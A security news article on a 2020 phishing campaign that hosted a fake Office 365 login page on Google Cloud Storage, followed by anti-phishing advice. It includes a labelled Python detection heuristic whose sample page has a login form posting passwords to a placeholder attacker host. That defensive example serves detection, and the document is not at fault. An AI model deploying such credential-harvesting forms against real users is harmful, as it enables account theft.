Threat Actors Exploited Google Clouds to Launch Phishing Attacks


21 August 2020, Kathmandu

Sometimes we are unable to comprehend the advancement the world is making in terms of digital transformation. And when we choose to ignore the threats that come with it, it is often too late. A report from Check Point Research described a phishing attack that exploited Google Cloud.

Yes! The clouds may not be the safest place, after all.

Threat actors were found exploiting Google Cloud to host malicious payloads and launch phishing attacks.

Google may have dealt with this vulnerability, but it is up to us to stay vigilant and protect our data. In this article, we will also discuss some ways you can do that, especially on cloud services.

Let’s break down the Google Cloud Phishing Journey.

How did it Happen?

First, threat actors uploaded a PDF to Google Drive. They disguised the PDF to resemble a Microsoft SharePoint notice, but in reality, it contained a link to an MS Access Document.

[Image: the PDF uploaded to Google Drive. Credit: Check Point]

Once clicked, the link redirected the user to a phishing page hosted on storage.googleapis[.]com/asharepoint-unwearied-439052791/index.html.

The phishing page would then prompt the user to log in with their Office 365 or organization email and password.

After the user entered the login credentials, the page redirected to a real PDF report published by a renowned global consulting firm.

And that’s the trick! Users wouldn’t be suspicious even for a second, both because they would think that they were viewing something useful and because the phishing page is hosted on Google Cloud Storage.

For the same reason, it is also difficult for security professionals to identify or detect such phishing campaigns.

“However, viewing the phishing page’s source code has revealed that most of the resources are loaded from a website that belongs to the attackers, prvtsmtp[.]com,” the report stated.


After further investigation of the website, researchers found that it resolved to a Ukrainian IP address.
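The indicator described above (a login page served from a shared cloud storage host while its resources and form target point at an unrelated domain) can be turned into a simple triage check. This is an added example, not code from Check Point or from the original article; the function name `triage`, the bucket name and `attacker.example` are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Hosts where the domain says nothing about who owns the content.
# storage.googleapis.com comes from the article; extend for your environment.
SHARED_HOSTS = {"storage.googleapis.com"}

class _Collector(HTMLParser):
    """Collect loaded-resource/form URLs and note any password field."""
    def __init__(self):
        super().__init__()
        self.urls, self.has_password = [], False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.has_password = True
        if tag == "a":
            return  # plain links are navigation, not loaded resources
        self.urls += [attrs[k] for k in ("src", "href", "action") if attrs.get(k)]

def triage(page_url, html):
    """Heuristic triage only: a hit means 'send to an analyst', not 'malicious'."""
    page_host = (urlparse(page_url).hostname or "").lower()
    parser = _Collector()
    parser.feed(html)
    external = set()
    for ref in parser.urls:
        # urljoin resolves relative and protocol-relative (//host/path) references
        host = (urlparse(urljoin(page_url, ref)).hostname or "").lower()
        if host and host != page_host:
            external.add(host)
    shared = page_host in SHARED_HOSTS
    return {"shared_host": shared, "credential_form": parser.has_password,
            "external_hosts": sorted(external),
            "suspicious": shared and parser.has_password and bool(external)}

# Constructed sample page (not the real phishing page; attacker.example is a placeholder).
SAMPLE_URL = "https://storage.googleapis.com/example-bucket/index.html"
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="//attacker.example/css/login.css">
<script src="https://attacker.example/js/app.js"></script></head><body>
<img src="logo.png">
<form action="https://attacker.example/post.php" method="post">
<input type="email" name="user"><input type="password" name="pass"></form>
<a href="https://www.microsoft.com/">Privacy</a></body></html>"""

if __name__ == "__main__":
    print(triage(SAMPLE_URL, SAMPLE_HTML))
```

Legitimate pages also load assets from CDNs, so in practice the external host list would be compared against an allowlist before raising an alert.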

What Next?

Well, Google has a zero-tolerance policy. So, it immediately suspended the phishing URL and all those associated with it.

There have also been incidents in the past where threat actors hosted phishing pages using Dropbox and Microsoft Azure.


How To Prevent Such Phishing Attacks?

Check Point also suggested some precautionary measures to protect users against such phishing attacks.

Have a look at the following points:

  • Beware of lookalike domains and spelling errors. Unfamiliar email senders and spelling errors are a straight giveaway.
  • Be cautious when opening or downloading files received via email from unknown senders. Try to make sense of any suspicious call-to-action and subject line.
  • Ensure that you order products/services from an authentic source. One way to do that could be NOT clicking on promotional links in emails. Try to Google the desired service instead.
  • Beware of ‘special’ offers that could be nothing but a scam. For instance, ‘an exclusive cure for coronavirus for $150’. That should be a dead giveaway.
  • Try to use separate passwords for different applications and accounts.

As they say, “Users’ mailboxes are the front door into your organization.”

Email security has become a necessity that needs proper attention in an organization’s architecture.
